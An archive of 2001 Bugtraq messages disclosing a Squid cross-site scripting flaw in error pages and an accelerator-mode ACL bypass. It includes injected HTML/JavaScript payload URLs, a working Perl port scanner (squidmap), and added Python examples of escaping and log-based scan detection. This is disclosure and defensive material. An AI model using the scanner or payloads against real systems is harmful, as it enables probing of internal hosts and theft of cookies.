6765241 2001-07-18 21:45 +0900 /59 lines/ TAKAGI, Hiromitsu <takagi@etl.go.jp>
Sent by: joel@lysator.liu.se
Imported: 2001-07-18 17:54 by Brevbäraren
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <18066>
Subject: Squid cross-site scripting (Fw: Squid doesn't quote urls in error messages.)
------------------------------------------------------------
From: "TAKAGI, Hiromitsu" <takagi@etl.go.jp>
To: bugtraq@securityfocus.com
Message-ID: <20010718214340.14FE.TAKAGI@etl.go.jp>

The following problem is not registered on the vulnerabilities database.

http://www.securityfocus.com/vdb/middle.html?vendor=&title=Squid%20Web%20Proxy&version=any
http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=squid

Related messages:
http://www.squid-cache.org/mail-archive/squid-dev/200010/0361.html
http://www.squid-cache.org/mail-archive/squid-dev/200011/0051.html
http://www.securityfocus.com/archive/82/142120

Fix:
http://www.squid-cache.org/Versions/v2/2.4/diff-2.4.DEVEL4-2.4.PRE-STABLE.gz
http://www.squid-cache.org/Versions/v2/2.3/diff-2.3.STABLE4-2.3.STABLE5.gz

-- 
Hiromitsu Takagi, Ph.D.
National Institute of Advanced Industrial Science and Technology,
Tsukuba Central 2, 1-1-1, Umezono, Tsukuba, Ibaraki 305-8568, Japan
http://www.etl.go.jp/~takagi/

Forwarded by "TAKAGI, Hiromitsu" <takagi@etl.go.jp>
----------------------- Original Message -----------------------
From: Lincoln Yeoh <lyeoh@POP.JARING.MY>
To: VULN-DEV@SECURITYFOCUS.COM
Date: Fri, 27 Oct 2000 17:47:00 +0800
Subject: Squid doesn't quote urls in error messages.
----

Hi,

I noticed that Squid 2.3.STABLE4 doesn't quote urls in error messages.

For example if a user visits the following url

http://www.dotcom.com/ <b>test</b>

The user will get an invalid url page with test in bold.

Or even more fun with:

http://www.somecompany.com/<img src="http://www.mysite.com/mylogo.gif">

You can actually get a working form in such an error message! Javascript too.
So it may be possible to rip out other sites' cookies from browsers using this (see DKrypt's and other people's stuff on it). Also maybe do a fake form/page :).

I haven't really tried it myself, and so I can't confirm if it really works (that's why it's in VULN-DEV ;) ).

Cheerio,
Link.
--------------------- Original Message Ends --------------------
(6765241) /TAKAGI, Hiromitsu <takagi@etl.go.jp>/(Rewrapped)

6766278 2001-07-18 21:16 +0100 /81 lines/ Paul Nasrat <pnasrat@uk.now.com>
Sent by: joel@lysator.liu.se
Imported: 2001-07-18 22:34 by Brevbäraren
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <18090>
Subject: Squid httpd acceleration acl bug enables portscanning
------------------------------------------------------------
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Security Advisory: NASR-2001-001 <pnasrat@uk.now.com>
Date: 18 July 2001

Summary:
Squid can be used to proxy and also portscan if set up as a httpd accelerator (reverse proxy).

Versions Affected: 2.3STABLE3 and 2.3STABLE4 unpatched
This includes the RedHat 7.0 squid, but not RedHat 6.2 or 7.1 - vendors basing their RPMS on RedHat 7.0 are advised to check and apply the patch from the squid site. Debian uses 2.2 and 2.4 so is unaffected.

Description of problem:
Squid has a known bug in 2.3STABLE4 which ignores acl's in httpd_accel mode. Note this is only if httpd_accel_host is set and httpd_accel_with_proxy off is set. This is not the default configuration so it is not vulnerable without making these configuration changes. This enables portscanning via squid running in this mode, potentially allowing remote attackers to compromise machines through a squid set up this way.

I discovered this whilst doing a security test on a variety of configs and later confirmed it from the squid site below:
http://www.squid-cache.org/Versions/v2/2.3/bugs/

Steps to Reproduce:
1. Set squid to httpd_accel mode, with a particular host and strict acl's
2.
export httpd_proxy="http://squid-server:port"
3. lynx http://victim:port/

Actual Results:
You get a http 200 code if the port is open and sometimes a response with some services SSH, SMTP, etc

Expected Results:
Should be access denied (403)

Discussion:
Proxies have often been used in anonymizing attacks on http, but as more sites use reverse proxying as a method of distributing their network load and load balancing requests there is the possibility that malicious users could gain proxied access or internal information via them.

I attach a sample squid.conf and a sample perl portmapper taking advantage of this bug. Squid will log you running this so it isn't anonymous, and the task of discovering accelerated sites automatically is left as an exercise for the reader.

Solution:
Squid are aware of this bug and have a patch on their site. RedHat, Immunix and others have been notified and updates are imminent later today. Consider using additional security measures such as a squid redirector, packet filtering, etc.
Paul Nasrat

- -- 
"we apologise for any inconvenience" - God's Last Message to His Creation
Courtesy of Douglas Adams

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org

iD8DBQE7VbucnB2rnqD9/ooRAlM2AJ4xXtjoiLpMH9PwWbh6d1KPQzTxOACgoTRA
5iTMflCCdMGKDMW8+NowgzI=
=lohz
-----END PGP SIGNATURE-----
(6766278) /Paul Nasrat <pnasrat@uk.now.com>/(Rewrapped)
Attachment (text/plain) in text 6766279
Attachment (text/plain) in text 6766280

6766279 2001-07-18 21:16 +0100 /29 lines/ Paul Nasrat <pnasrat@uk.now.com>
Imported: 2001-07-18 22:34 by Brevbäraren
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <18091>
Attachment (text/plain) to text 6766278
Subject: Attachment to: Squid httpd acceleration acl bug enables portscanning
------------------------------------------------------------
# Sample Squid Config
# Paul Nasrat <pnasrat@uk.now.com>

http_port 3128
cache_mem 128 MB
refresh_pattern ^ftp:      1440   20%   10080
refresh_pattern ^gopher:   1440    0%    1440
refresh_pattern .             0   20%    4320

acl all src 0.0.0.0/0.0.0.0
acl manager proto cache_object
acl localhost src 127.0.0.1/255.255.255.255
acl SSL_ports port 443 563
acl Safe_ports port 80
acl CONNECT method CONNECT

http_access allow manager localhost
http_access deny manager
http_access deny CONNECT !SSL_ports
http_access deny !Safe_ports
http_access allow localhost

# Accelerator mode with proxying switched off: the combination under which
# 2.3STABLE3/4 ignore the http_access rules above.
httpd_accel_host localhost
httpd_accel_port 80
httpd_accel_with_proxy off
(6766279) /Paul Nasrat <pnasrat@uk.now.com>/--------

6766280 2001-07-18 21:16 +0100 /48 lines/ Paul Nasrat <pnasrat@uk.now.com>
Imported: 2001-07-18 22:34 by Brevbäraren
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <18092>
Attachment (text/plain) to text 6766278
Subject: Attachment to: Squid httpd acceleration acl bug enables portscanning
------------------------------------------------------------
#!/usr/bin/perl
# Author: Paul Nasrat <pnasrat@uk.now.com>
# Date: 7 July 2001
# squidmap: scan a target's TCP ports through a Squid httpd accelerator
# that ignores its http_access ACLs (NASR-2001-001).

use strict;
use warnings;
use Getopt::Std;
use LWP::UserAgent;
use HTTP::Request;

$|++;
my $version = "0.1";   # referenced but never set in the original

my %args;
getopts('b:P:t:L:H:', \%args);

# Both the proxy (-b) and the target (-t) are required.
if (!$args{t} || !$args{b}) {
    print_help();
    exit 0;
}

my $low        = $args{L} || 1;
my $high       = $args{H} || 8192;
my $proxy      = $args{b};
my $proxy_port = $args{P} || 80;
my $target     = $args{t};

my $ua = LWP::UserAgent->new;
# Route every request through the accelerator; if its ACLs were honoured,
# anything but the configured httpd_accel_host would be refused.
$ua->proxy(['http', 'ftp'], "http://$proxy:$proxy_port/");

print "squidmap $version scanning $target via http://$proxy:$proxy_port\n";
print "Port\tState\t\tService\t\tResponse\n";

for (my $port = $low; $port <= $high; $port++) {
    # A CONNECT to target:port via the proxy; a 2xx reply means the proxy
    # managed to open the connection, i.e. the port is open.
    my $request = HTTP::Request->new('CONNECT', "http://$target:$port");
    my $res     = $ua->request($request);
    my $service = getservbyport($port, 'tcp') || '';

    if ($res->is_success) {
        print "$port\topen\t\t$service\t\t", $res->content, "\n";
    }
}

sub print_help {
    print "Usage: squidmap <options> where options:\n";
    print "-b host  HTTP proxy via host\n";
    print "-P ##    HTTP proxy port (default: 80)\n";
    print "-L ##    low end/start of range (default: 1)\n";
    print "-H ##    high end/end of range (default: 8192)\n";
    print "-t host  target to attempt to scan\n";
}
(6766280) /Paul Nasrat <pnasrat@uk.now.com>/--------

6770359 2001-07-18 08:54 -0700 /37 lines/ Rude Yak <rudeyak@yahoo.com>
Sent by: joel@lysator.liu.se
Imported: 2001-07-19 18:58 by Brevbäraren
External recipient: BUGTRAQ@securityfocus.com
Recipient: Bugtraq (import) <18116>
Subject: Re: Squid cross-site scripting (Fw: Squid doesn't quote urls in error messages.)
------------------------------------------------------------
From: Rude Yak <rudeyak@yahoo.com>
To: BUGTRAQ@securityfocus.com
Message-ID: <20010718155438.33344.qmail@web13301.mail.yahoo.com>

Short term, would it be possible to remove "%U" from ERR_* in squid/etc/errors, or does the issue apply to other %-tags in squid templates as well?

--------------------------------------------------------------------------
I noticed that Squid 2.3.STABLE4 doesn't quote urls in error messages.

For example if a user visits the following url

http://www.dotcom.com/ <b>test</b>

The user will get an invalid url page with test in bold.

Or even more fun with:

http://www.somecompany.com/<img src="http://www.mysite.com/mylogo.gif">

You can actually get a working form in such an error message! Javascript too.

So it may be possible to rip out other sites' cookies from browsers using this (see DKrypt's and other people's stuff on it). Also maybe do a fake form/page :).
(6770359) /Rude Yak <rudeyak@yahoo.com>/--(Rewrapped)
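The quoting the thread is about, as an added example that is not part of any message above and not Squid's own code: a small Python renderer for a constructed, cut-down template in the style of Squid's ERR_* pages. expand_unquoted drops the request data into the HTML verbatim, which is what 2.3.STABLE4 did; expand_quoted HTML-escapes every request-derived token before substitution, which is what the linked fix amounts to. The template text, the %U/%H/%M token set and the second payload URL (one carried in the host part) are this example's own assumptions; the first payload is Lincoln's <img> URL. It also answers Rude Yak's question in the negative: removing %U alone leaves any other token that carries request data, such as the host, exploitable in the same way.

```python
import html
import re

# Constructed, cut-down template in the style of Squid's ERR_INVALID_URL; the
# real templates live in squid/etc/errors and this one is an illustration only.
ERR_INVALID_URL = (
    '<HTML><HEAD><TITLE>ERROR: The requested URL could not be retrieved</TITLE></HEAD>\n'
    '<BODY><H1>ERROR</H1>\n'
    '<P>While trying to retrieve the URL: <A HREF="%U">%U</A>\n'
    '<P>The following error was encountered: <STRONG>Invalid URL</STRONG>\n'
    '<P>Request: %M %U on host %H\n'
    '</BODY></HTML>\n'
)

# %U is the token the thread names; %H (host) and %M (method) are assumed here
# to stand for the other request-derived tokens the templates carry.
TOKEN_RE = re.compile(r"%([UHM])")
TAG_RE = re.compile(r"<\s*/?\s*([a-zA-Z][a-zA-Z0-9]*)")


def host_of(url):
    """Authority part of an absolute URL, taken without validation, as a proxy
    that has already classed the URL as invalid still has it."""
    rest = url.split("://", 1)[1] if "://" in url else url
    return rest.split("/", 1)[0]


def token_values(url, method):
    return {"U": url, "H": host_of(url), "M": method}


def expand_unquoted(template, url, method="GET"):
    """2.3.STABLE4 behaviour: request data substituted into the HTML verbatim."""
    values = token_values(url, method)
    return TOKEN_RE.sub(lambda m: values[m.group(1)], template)


def expand_quoted(template, url, method="GET"):
    """Hardened: every request-derived token is HTML-escaped before substitution.
    quote=True also escapes " and ', which matters because %U sits inside an
    attribute value (HREF="%U") as well as in element text."""
    values = token_values(url, method)
    return TOKEN_RE.sub(lambda m: html.escape(values[m.group(1)], quote=True), template)


def injected_tags(page, template):
    """Tag names present in the rendered page that the template never contained."""
    expected = {t.lower() for t in TAG_RE.findall(template)}
    return sorted({t.lower() for t in TAG_RE.findall(page)} - expected)


# Lincoln's payload from the thread, and a constructed one carried in the host
# part, which reaches the page through %H rather than %U.
IMG_URL = 'http://www.somecompany.com/<img src="http://www.mysite.com/mylogo.gif">'
HOST_URL = "http://<img src=x onerror=alert(1)>/"

if __name__ == "__main__":
    for url in (IMG_URL, HOST_URL):
        print("unquoted:", injected_tags(expand_unquoted(ERR_INVALID_URL, url), ERR_INVALID_URL))
        print("quoted:  ", injected_tags(expand_quoted(ERR_INVALID_URL, url), ERR_INVALID_URL))
```

Escaping covers the two contexts the template uses, element text and a double-quoted attribute value. A template that links to %U still hands the browser the attacker's URL as a link target, so the scheme of that link is a separate check the escaping does not make.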
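Since, as the advisory says, Squid logs every request it forwards, a scan run through the accelerator is visible in access.log. The following Python is an added example, not from the advisory, its attachments or Squid, that reads constructed native-format access.log lines and reports two things: requests an accelerator for www.example.com forwarded to any other origin, which with httpd_accel_with_proxy off should never happen and so marks the ACL bypass being exercised, and clients that touched several distinct ports on one host, which is the squidmap pattern. The log lines, the addresses and host names, the accelerated host and the port threshold are all this example's assumptions.

```python
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed access.log lines in Squid's native format:
# timestamp elapsed client code/status bytes method URL ident hierarchy/peer type
SAMPLE_LOG = """\
995486160.101     12 10.1.2.3 TCP_MISS/200 5120 GET http://www.example.com/ - DIRECT/192.0.2.10 text/html
995486161.204      3 198.51.100.7 TCP_MISS/200 210 GET http://intranet.example.com:22/ - DIRECT/10.0.0.5 -
995486161.305      2 198.51.100.7 TCP_MISS/200 180 GET http://intranet.example.com:25/ - DIRECT/10.0.0.5 -
995486161.406      1 198.51.100.7 TCP_MISS/503 1320 GET http://intranet.example.com:26/ - DIRECT/10.0.0.5 text/html
995486161.507      2 198.51.100.7 TCP_MISS/200 150 CONNECT intranet.example.com:80 - DIRECT/10.0.0.5 -
995486161.608      2 198.51.100.7 TCP_MISS/200 150 CONNECT intranet.example.com:443 - DIRECT/10.0.0.5 -
995486161.709      2 198.51.100.7 TCP_MISS/200 150 CONNECT intranet.example.com:8080 - DIRECT/10.0.0.5 -
995486162.010     15 10.1.2.4 TCP_HIT/200 4096 GET http://www.example.com/index.html - NONE/- text/html
"""

ACCEL_HOST = "www.example.com"   # assumed httpd_accel_host of the accelerator
DEFAULT_PORTS = {"http": 80, "https": 443, "ftp": 21, "gopher": 70}


def parse_access_log(text):
    """One dict per native-format line, with the destination host and port resolved."""
    entries = []
    for line in text.splitlines():
        f = line.split()
        if len(f) < 7:
            continue
        _, _, status = f[3].partition("/")
        method, url = f[5], f[6]
        if method == "CONNECT":
            # CONNECT is logged as a bare host:port
            host, sep, port = url.rpartition(":")
            if not sep:
                host, port = url, "443"
            port = int(port)
        else:
            parts = urlsplit(url)
            host = parts.hostname or ""
            try:
                port = parts.port or DEFAULT_PORTS.get(parts.scheme, 80)
            except ValueError:
                port = DEFAULT_PORTS.get(parts.scheme, 80)
        entries.append({"ts": float(f[0]), "client": f[2], "status": int(status),
                        "method": method, "host": host, "port": port})
    return entries


def off_accel_requests(entries, accel_host):
    """Requests forwarded to an origin other than the accelerated host. With
    httpd_accel_with_proxy off there should be none; each one is the bypass."""
    return [e for e in entries if e["host"] != accel_host]


def scan_candidates(entries, min_ports=3):
    """(client, host) pairs that touched at least min_ports distinct ports, with
    the ports probed and those that answered 2xx (open, per the advisory)."""
    probed = defaultdict(set)
    opened = defaultdict(set)
    for e in entries:
        key = (e["client"], e["host"])
        probed[key].add(e["port"])
        if 200 <= e["status"] < 300:
            opened[key].add(e["port"])
    return {key: {"probed": sorted(ports), "open": sorted(opened[key])}
            for key, ports in probed.items() if len(ports) >= min_ports}


if __name__ == "__main__":
    log = parse_access_log(SAMPLE_LOG)
    for e in off_accel_requests(log, ACCEL_HOST):
        print(f"off-accelerator: {e['client']} {e['method']} {e['host']}:{e['port']} -> {e['status']}")
    for (client, host), r in scan_candidates(log).items():
        print(f"scan: {client} -> {host} probed {r['probed']} open {r['open']}")
```

The off-accelerator check is the stronger of the two for a reverse proxy: a single forwarded request to the wrong origin is already a finding, whereas the port-count rule needs a threshold and a time window to be tuned for the site. Both work on the proxy's own log, so neither depends on the scanned host noticing anything.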